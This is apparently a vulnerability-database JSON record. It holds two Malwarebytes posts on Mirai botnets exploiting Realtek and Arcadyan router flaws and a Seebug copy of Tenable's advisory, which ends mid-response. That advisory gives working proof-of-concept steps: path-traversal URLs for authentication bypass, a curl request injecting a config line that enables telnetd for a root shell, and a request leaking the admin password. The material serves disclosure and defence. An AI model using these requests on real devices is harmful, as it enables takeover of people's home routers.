"Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "immutableFields": []}], "malwarebytes": [{"id": "MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "hash": "637b2bcc1bd31472d8fe133bc2712522", "type": "malwarebytes", "bulletinFamily": "blog", "title": "Realtek-based routers, smart devices are being gobbled up by a voracious botnet", "description": "A few weeks ago we blogged about a vulnerability in home routers that was weaponized by the Mirai botnet just two days after disclosure. Mirai hoovers up vulnerable Internet of Things (IoT) devices and adds them to its network of zombie devices, which can then be used to [launch huge Distributed Denial of Service](<https://blog.malwarebytes.com/botnets/2021/08/largest-ddos-attack-ever-reported-gets-hoovered-up-by-cloudflare/>) (DDoS) attacks.\n\nLast time it was a [vulnerability in the Arcadyan firmware](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/>) found in devices distributed by some of today\u2019s biggest router vendors and internet service providers, such as ASUS, Orange, Vodafone, Telstra, Verizon, Deutsche Telekom, and British Telecom.\n\nA similar situation is going on right now with routers and Wi-Fi amplifiers that are built on the Realtek RTL819xD chipset. Realtek chipsets are found in many embedded IoT devices. At least 65 vendors are affected. The vulnerabilities enable unauthenticated attackers to fully compromise the target device and execute arbitrary code with the highest level of privilege. Exactly what Mirai wants.\n\n### Vulnerabilities\n\nThe vulnerabilities were found and disclosed by [IoT Inspector](<https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/>), a platform for automated security analysis of IoT firmware. In total they identified more than a dozen vulnerabilities, but one of them (CVE-2021-35395) has already been found to be actively exploited in in the wild.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The description of [CVE-2021-35395](<https://nvd.nist.gov/vuln/detail/CVE-2021-35395>) contains a pretty dense explanation, but it boils down as follows.\n\nThere are two types of a management interfaces that can accessed over the Internet. Both of them are vulnerable to multiple stack buffer overflows due to &quot;unsafe&quot; copying of parameters, and two separate arbitrary command injection problems, again stemming from the apparently unsafe handling of parameters. These allow an attacker to run arbitrary commands on the vulnerable device.\n\nFor anyone unfamiliar with web programming, this implies that the code behind these Internet-exposed management interfaces are failing to perform the most basic security hygiene.\n\nThe description ends:\n\n> Some vendors use [the management interface] as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK web server will probably contain its own set of issues on top of the Realtek ones\u2026\n\nIn other words, how vulnerable your device is may depend on whether, and how well, the vendor added their own authentication methods, but vendors may well have added more problems.\n\n### Same botnet, same operator?\n\nWith all the similarities in the vulnerabilities and the speed with which they are being exploited after disclosure, it will not come as a total surprise that the botnet that is actively going after these vulnerable devices is Mirai. Mirai is the name of the malware behind one of the most active and well-known IoT botnets. After the source code of the original Mirai botnet was leaked, it was quickly replicated by other cybercriminals, so there are now several independent operators each running their own Mirai-based botnets.\n\n[Researchers at SAM Seamless Network](<https://securingsam.com/realtek-vulnerabilities-weaponized/>) were able to establish that the web server serving the Mirai botnet behind these attacks uses the same network subnet [seen by Unit 42](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) in March of 2021, indicating that the same attacker was behind those incidents. Due to the similarity in scripts it was assumed that the same actor was behind the exploitation of the vulnerability listed under CVE-2021-20090 which is present in the Arcadyan firmware.\n\nIt also stands to reason to assume this is the actor that was responsible for the [largest DDoS attack](<https://blog.malwarebytes.com/botnets/2021/08/largest-ddos-attack-ever-reported-gets-hoovered-up-by-cloudflare/>) recorded to date, just last week.\n\n### Mitigation\n\nRealtek has since [patched](<https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf>) the vulnerabilities, but it will take a while for manufacturers who use their chipset to make the patches available to their customers. And again many of the owners of vulnerable devices are home users. They may have no idea whether their device is vulnerable and even if they do, they will likely need guidance to apply a firmware upgrade.\n\nRealTek is a common chipset used for sound and Wi-Fi by many vendors such as ARRIS, ASUSTek, Belkin, Buffalo, D-Link, EnGenius, Huawei, LG, Logitec, NetGear, TRENDnet, and many more. I found a [list of affected devices courtesy of Mainstream Technologies](<https://www.mainstream-tech.com/realtek-security-notice/>) but this is only a partial list. Alongside its list, Mainstream Technologies warns that: &quot;If your device is over 10 years old, it definitely will not get a patch. If it is over 5 years it probably will not get a patch&quot;.\n\nSo even if your device is not on it, that doesn\u2019t mean it\u2019s not vulnerable. Any device that uses a Realtek RTL819D chipset is vulnerable and the bots scanning the internet for vulnerable devices will definitely be able to find them.\n\nIt is cases like these that could end up to be a deciding factor in the discussion whether vendors/governments/[law enforcement](<https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/>) should be allowed to patch vulnerable systems that do not belong to them or to the infrastructure they are responsible for.\n\nStay safe, everyone!\n\nThe post [Realtek-based routers, smart devices are being gobbled up by a voracious botnet](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/realtek-based-routers-smart-devices-are-being-gobbled-up-by-a-voracious-botnet/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "published": "2021-08-24T13:36:52", "modified": "2021-08-24T13:36:52", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/realtek-based-routers-smart-devices-are-being-gobbled-up-by-a-voracious-botnet/", "reporter": "Pieter Arntz", "references": [], "cvelist": ["CVE-2021-20090", "CVE-2021-35392", "CVE-2021-35395"], "immutableFields": [], "lastseen": "2021-08-27T12:34:55", "history": [{"bulletin": {"id": "MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "hash": "c7de22bd878c694eec55c0e22502ff92", "type": "malwarebytes", "bulletinFamily": "blog", "title": "Realtek-based routers, smart devices are being gobbled up by a voracious botnet", "description": "A few weeks ago we blogged about a vulnerability in home routers that was weaponized by the Mirai botnet just two days after disclosure. Mirai hoovers up vulnerable Internet of Things (IoT) devices and adds them to its network of zombie devices, which can then be used to [launch huge Distributed Denial of Service](<https://blog.malwarebytes.com/botnets/2021/08/largest-ddos-attack-ever-reported-gets-hoovered-up-by-cloudflare/>) (DDoS) attacks.\n\nLast time it was a [vulnerability in the Arcadyan firmware](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/>) found in devices distributed by some of today\u2019s biggest router vendors and internet service providers, such as ASUS, Orange, Vodafone, Telstra, Verizon, Deutsche Telekom, and British Telecom.\n\nA similar situation is going on right now with routers and Wi-Fi amplifiers that are built on the Realtek RTL819xD chipset. Realtek chipsets are found in many embedded IoT devices. At least 65 vendors are affected. The vulnerabilities enable unauthenticated attackers to fully compromise the target device and execute arbitrary code with the highest level of privilege. Exactly what Mirai wants.\n\n### Vulnerabilities\n\nThe vulnerabilities were found and disclosed by [IoT Inspector](<https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/>), a platform for automated security analysis of IoT firmware. In total they identified more than a dozen vulnerabilities, but one of them (CVE-2021-35395) has already been found to be actively exploited in in the wild.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The description of [CVE-2021-35395](<https://nvd.nist.gov/vuln/detail/CVE-2021-35395>) contains a pretty dense explanation, but it boils down as follows.\n\nThere are two types of a management interfaces that can accessed over the Internet. Both of them are vulnerable to multiple stack buffer overflows due to &quot;unsafe&quot; copying of parameters, and two separate arbitrary command injection problems, again stemming from the apparently unsafe handling of parameters. These allow an attacker to run arbitrary commands on the vulnerable device.\n\nFor anyone unfamiliar with web programming, this implies that the code behind these Internet-exposed management interfaces are failing to perform the most basic security hygiene.\n\nThe description ends:\n\n> Some vendors use [the management interface] as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK web server will probably contain its own set of issues on top of the Realtek ones\u2026\n\nIn other words, how vulnerable your device is may depend on whether, and how well, the vendor added their own authentication methods, but vendors may well have added more problems.\n\n### Same botnet, same operator?\n\nWith all the similarities in the vulnerabilities and the speed with which they are being exploited after disclosure, it will not come as a total surprise that the botnet that is actively going after these vulnerable devices is Mirai. Mirai is the name of the malware behind one of the most active and well-known IoT botnets. After the source code of the original Mirai botnet was leaked, it was quickly replicated by other cybercriminals, so there are now several independent operators each running their own Mirai-based botnets.\n\n[Researchers at SAM Seamless Network](<https://securingsam.com/realtek-vulnerabilities-weaponized/>) were able to establish that the web server serving the Mirai botnet behind these attacks uses the same network subnet [seen by Unit 42](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) in March of 2021, indicating that the same attacker was behind those incidents. Due to the similarity in scripts it was assumed that the same actor was behind the exploitation of the vulnerability listed under CVE-2021-20090 which is present in the Arcadyan firmware.\n\nIt also stands to reason to assume this is the actor that was responsible for the [largest DDoS attack](<https://blog.malwarebytes.com/botnets/2021/08/largest-ddos-attack-ever-reported-gets-hoovered-up-by-cloudflare/>) recorded to date, just last week.\n\n### Mitigation\n\nRealtek has since [patched](<https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf>) the vulnerabilities, but it will take a while for manufacturers who use their chipset to make the patches available to their customers. And again many of the owners of vulnerable devices are home users. They may have no idea whether their device is vulnerable and even if they do, they will likely need guidance to apply a firmware upgrade.\n\nRealTek is a common chipset used for sound and Wi-Fi by many vendors such as ARRIS, ASUSTek, Belkin, Buffalo, D-Link, EnGenius, Huawei, LG, Logitec, NetGear, TRENDnet, and many more. I found a [list of affected devices courtesy of Mainstream Technologies](<https://www.mainstream-tech.com/realtek-security-notice/>) but this is only a partial list. Alongside its list, Mainstream Technologies warns that: &quot;If your device is over 10 years old, it definitely will not get a patch. If it is over 5 years it probably will not get a patch&quot;.\n\nSo even if your device is not on it, that doesn\u2019t mean it\u2019s not vulnerable. Any device that uses a Realtek RTL819D chipset is vulnerable and the bots scanning the internet for vulnerable devices will definitely be able to find them.\n\nIt is cases like these that could end up to be a deciding factor in the discussion whether vendors/governments/[law enforcement](<https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/>) should be allowed to patch vulnerable systems that do not belong to them or to the infrastructure they are responsible for.\n\nStay safe, everyone!\n\nThe post [Realtek-based routers, smart devices are being gobbled up by a voracious botnet](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/realtek-based-routers-smart-devices-are-being-gobbled-up-by-a-voracious-botnet/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "published": "2021-08-24T13:36:52", "modified": "2021-08-24T13:36:52", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/realtek-based-routers-smart-devices-are-being-gobbled-up-by-a-voracious-botnet/", "reporter": "Pieter Arntz", "references": [], "cvelist": ["CVE-2021-20090", "CVE-2021-35392", "CVE-2021-35395"], "immutableFields": [], "lastseen": "2021-08-24T14:34:38", "history": [], "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-35395", "CVE-2021-20090", "CVE-2021-35392"]}, {"type": "threatpost", "idList": ["THREATPOST:3CDCE42FF7DD2A68B77DC15C8BB1A6BA", "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}, {"type": "thn", "idList": ["THN:B73C2EFCE2F6E4AC50F5CFFF3165A5C1", "THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "seebug", "idList": ["SSV:99329"]}], "modified": "2021-08-24T14:34:38", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-08-24T14:34:38", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-08-24T14:34:38", "differentElements": ["cvss"], "edition": 1}], "viewCount": 42, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-35392", "CVE-2021-35395", "CVE-2021-20090"]}, {"type": "attackerkb", "idList": ["AKB:41DB8118-B27F-4492-8132-F2D75D5111D4"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E", "THREATPOST:3CDCE42FF7DD2A68B77DC15C8BB1A6BA"]}, {"type": "thn", "idList": ["THN:B73C2EFCE2F6E4AC50F5CFFF3165A5C1", "THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}], "modified": "2021-08-27T12:34:55", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-08-27T12:34:55", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.rss.RssBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"]}, {"id": "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB", "hash": "2ad56a520fc1dfea6975e33bff7cc2b4", "type": "malwarebytes", "bulletinFamily": "blog", "title": "Home routers are being hijacked using vulnerability disclosed just 2 days ago", "description": "The early bird catches the worm. Unless the worm was early enough to hide.\n\nOn August 3, 2021 a vulnerability that was discovered by [Tenable](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) was made public. Only two days later, on August 5, [Juniper Threat Labs](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) identified some attack patterns that attempted to exploit this vulnerability in the wild. The vulnerability is listed as CVE-2021-20090.\n\n### Router firmware\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Under the [description of CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>) you will find:\n\n> \u201ca path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version &lt;= 1.02 and WSR-2533DHP3 firmware version &lt;= 1.24 could allow unauthenticated remote attackers to bypass authentication.\u201d\n\nBut during the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying Arcadyan firmware. In its synopsis, [Tenable lists](<https://www.tenable.com/security/research/tra-2021-13>) some 36 devices that have been confirmed to be affected. The list of affected devices include some of today\u2019s biggest router vendors and internet service providers, such as ASUS, Orange, Vodafone, Telstra, Verizon, Deutsche Telekom, and British Telecom.\n\nThe path traversal vulnerability means that some files on the devices can be accessed without authentication because they fall under a bypass list. Attackers can use this vulnerability to bypass authentication procedures on the affected routers and modems to enable the Telnet service, which will allow threat actors to connect to devices remotely and take over control of the affected device. The full technical details of the discovery and the Proof-of-Concept (PoC) can be found in the [Tenable TechBlog](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>).\n\n### Quick response\n\nOnce again, the importance of responsible disclosure is demonstrated since it only took threat actors two days after the publication of a PoC to add this vulnerability to their arsenal. The threat actor seems to be attempting to deploy a Mirai variant on the affected routers using scripts similar to those found to be used against devices from vendors like SonicWall, D-Link, Netgear, Cisco, Tenda, MicroFocus, and Netis. This same threat actor was found earlier to serve a Mirai variant leveraging [CVE-2021-27561](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27561>) and [CVE-2021-27562](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27562>), just hours after vulnerability details were published.\n\n### Mirai\n\nMirai is the name of the malware behind one of the most active and well-known Internet-of-Things (IoT) botnets. It started with Mirai taking advantage of insecure IoT devices in a simple but clever way. It scanned big blocks of the internet for open Telnet ports, then attempted to log in using default passwords. In this way, it was able to quickly corral an army of small, Internet-connected &quot;smart&quot; devices, like cameras, into a botnet.\n\nYou may remember hearing about this botnet after the [massive East Coast internet outage of 2016](<https://blog.malwarebytes.com/malwarebytes-news/2020/11/iot-antivirus-on-your-smart-device/>) when the Mirai botnet was leveraged in a [DDoS attack](<https://blog.malwarebytes.com/security-world/technology/2018/03/ddos-attacks-are-growing-what-can-businesses-do/>) aimed at Dyn, an Internet infrastructure company. Traffic to Dyn&#x27;s Internet directory servers throughout the US\u2014primarily on the East Coast but later on the opposite end of the country as well\u2014was stopped by a flood of malicious requests from tens of millions of IP addresses disrupting the system.\n\nAfter the source code of the original Mirai botnet was leaked, this code was quickly replicated by other cybercriminals, so there are now several independent operators each running their own Mirai-based botnets. These operators are engaged in an ongoing competition to find new victims and hijack devices from each other. The original authors of Mirai were convicted for leasing their botnet out for DDoS attacks and click fraud. But their successors are still very much using the foundations of the first Mirai botnet.\n\n### Mitigation\n\nThe vulnerability was patched in April and owners of any of the affected devices listed in the table mentioned above are advised to ask their router vendor for security patches. Tenable reported the issues to the [CERT Coordination Center](<https://kb.cert.org/vuls/>) for help with contacting and tracking all the affected vendors.\n\nWhat is worrying about the current situation is that many of the owners of vulnerable devices are home users that were provided with the device by their internet provider. They may have no idea whether their device is vulnerable and even if they do, they will likely need guidance to apply a firmware upgrade.\n\nThe post [Home routers are being hijacked using vulnerability disclosed just 2 days ago](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "published": "2021-08-09T17:06:56", "modified": "2021-08-09T17:06:56", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/", "reporter": "Pieter Arntz", "references": [], "cvelist": ["CVE-2021-20090", "CVE-2021-27561", "CVE-2021-27562"], "immutableFields": [], "lastseen": "2021-08-09T18:34:08", "history": [], "viewCount": 32, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27562", "CVE-2021-27561", "CVE-2021-20090"]}, {"type": "attackerkb", "idList": ["AKB:41DB8118-B27F-4492-8132-F2D75D5111D4"]}, {"type": "threatpost", "idList": ["THREATPOST:3F4C590CA1F6027665DF96DF6D651032", "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37", "THN:3907AE12F794F0523BEE196D6543A50F"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "seebug", "idList": ["SSV:99329"]}], "modified": "2021-08-09T18:34:08", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2021-08-09T18:34:08", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.rss.RssBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"]}], "seebug": [{"id": "SSV:99329", "hash": "a0ea65bf94c2de9d23f1db283d058bbb", "type": "seebug", "bulletinFamily": "exploit", "title": "Buffalo\u548cArcadyan\u591a\u6b3e\u8def\u7531\u5668\u8ba4\u8bc1\u7ed5\u8fc7RCE\u7b49\u591a\u4e2a\u6f0f\u6d1e", "description": "Tenable has discovered multiple vulnerabilities in routers manufactured by Arcadyan.\n\nDuring the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying Arcadyan firmware. \n\nPlease note that CVE-2021-20091 and CVE-2021-20092 have only been confirmed on Buffalo WSR-2533 models.\n\nCVE-2021-20090 : Path Traversal\nCVSSv3 Base Score: 8.1\nCVSSv3 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\nA path traversal vulnerability in the web interfaces of networking devices manufactured by Arcadyan, including Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24, could allow unauthenticated remote attackers to bypass authentication.\nThis vulnerability has also been confirmed to affect the following devices\nnote: the firmware versions listed do not indicate the latest affected firmware versions, only the firmware versions on which the issue was confirmed.\nPlease contact the devices' respective vendors for more information.\n\n| Vendor | Device | Found on version |\n| :-----| ----: | :----: |\n| ADB | ADSL wireless IAD router | 1.26S-R-3P |\n| Arcadyan | ARV7519 | 00.96.00.96.617ES |\n| Arcadyan | VRV9517 | 6.00.17 build04 |\n| Arcadyan | VGV7519 | 3.01.116 |\n| Arcadyan | VRV9518 | 1.01.00 build44 |\n| ASMAX | BBR-4MG / SMC7908 ADSL | 0.08 |\n| ASUS | DSL-AC88U (Arc VRV9517) | 1.10.05 build502 |\n| ASUS | DSL-AC87VG (Arc VRV9510) | 1.05.18 build305 |\n| ASUS | DSL-AC3100 | 1.10.05 build503 |\n| ASUS | DSL-AC68VG | 5.00.08 build272 |\n| Beeline | Smart Box Flash | 1.00.13_beta4 |\n| British Telecom | WE410443-SA | 1.02.12 build02 |\n| Buffalo | WSR-2533DHPL2 | 1.02 |\n| Buffalo | WSR-2533DHP3 | 1.24 |\n| Buffalo | BBR-4HG | |\n| Buffalo | BBR-4MG | 2.08 Release 0002 |\n| Buffalo | WSR-3200AX4S | 1.1 |\n| Buffalo | WSR-1166DHP2 | 1.15 |\n| Buffalo | WXR-5700AX7S | 1.11 |\n| Deutsche Telekom | Speedport Smart 3 | 010137.4.8.001.0 |\n| HughesNet | HT2000W | 0.10.10 |\n| KPN | ExperiaBox V10A (Arcadyan VRV9517) | 5.00.48 build453 |\n| KPN | VGV7519 | 3.01.116 |\n| O2 | HomeBox 6441 | 1.01.36 |\n| Orange | LiveBox Fibra (PRV3399) | 00.96.00.96.617ES |\n| Orange | LiveBox Fibra (PRV3399) | 00.96.00.96.617ES |\n| Skinny | Smart Modem (Arcadyan VRV9517) | 6.00.16 build01 |\n| SparkNZ | Smart Modem (Arcadyan VRV9517) | 6.00.17 build04 |\n| Telecom (Argentina) | Arcadyan VRV9518VAC23-A-OS-AM | 1.01.00 build44 |\n| TelMex | PRV33AC | 1.31.005.0012 |\n| TelMex | VRV7006 | |\n| Telstra | Smart Modem Gen 2 (LH1000) | 0.13.01r |\n| Telus | WiFi Hub (PRV65B444A-S-TS) | v3.00.20 |\n| Telus | NH20A | 1.00.10debug build06 |\n| Verizon | Fios G3100 | 2.0.0.6 |\n| Vodafone | EasyBox | 904\t4.16 |\n| Vodafone | EasyBox 903 | 30.05.714 |\n| Vodafone | EasyBox 802 | 20.02.226 |\n\nProof of Concept:\n\nThe vulnerability exists due to a list of folders which fall under a \"bypass list\" for authentication. For most of the devices listed, that means that the vulnerability can be triggered by multiple paths. The simplest examples would be:\n\nFor a device in which http://<ip>/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\nhttp://<ip>/images/..%2findex.htm\nhttp://<ip>/js/..%2findex.htm\nhttp://<ip>/css/..%2findex.htm\nTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal. Additionally, certain files (those found under /cgi/) require a csrf (named httoken on these devices) token and a valid Referer header which will cause an error if the referer includes the ..%2f traversal (which can be match/replaced as well). \n\nCVE-2021-20091 : Configuration File Injection\nCVSSv3 Base Score: 7.5\nCVSSv3 Vector: AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\nThe web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.\nProof of Concept:\nThe injection occurs in parameters which pass from apply_abstract.cgi to the device's global config file. Assuming the user is logged in (or, alternatively, the url can be changed to /images/..%2fapply_abstract.cgi, leveraging the path traversal), the following command could be used to inject a line into the configuration file which enables telnetd. \n\n```\ncurl --include -X POST http://<ip>/apply_abstract.cgi -H \"Referer: http://<ip>/ping.html\" --data \"action=start_ping&httoken=<valid httoken>&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=<ip>%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\"\n```\n\nThe %0A will be interpreted as a newline when the ping address is added to /tmp/etc/config/.glbcfg. When rebooted, a shell will be available on port 23.\nCVE-2021-20092 : Improper Access Control\nCVSSv3 Base Score: 5.9\nCVSSv3 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\nThe web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.\nProof of Concept:\n\nTo get a valid httoken, navigate to http://<ip of device>/loginerror.html in a modern browser (tested on chrome).\nOpen DevTools\nRun getToken() in the Console.\nCopy the token, and use it in the following command from a terminal:\n\n```\n$ curl --include \"http://192.168.11.1/cgi/cgi_i_filter.js?_tn=442853667\" -H \"Referer: http://192.168.11.1/loginerror.html\"\n\nHTTP/1.1 200 OK\nDate: Mon, 13 Jan 2020 15:24:03 GMT\nServer: Arcadyan httpd 1.0\nContent-type: application/x-javascript\nX-FRAME-OPTIONS: SAMEORIGIN\nConnection: close\n\n/*DEMO*/\nvar login_password = \u201c<admin 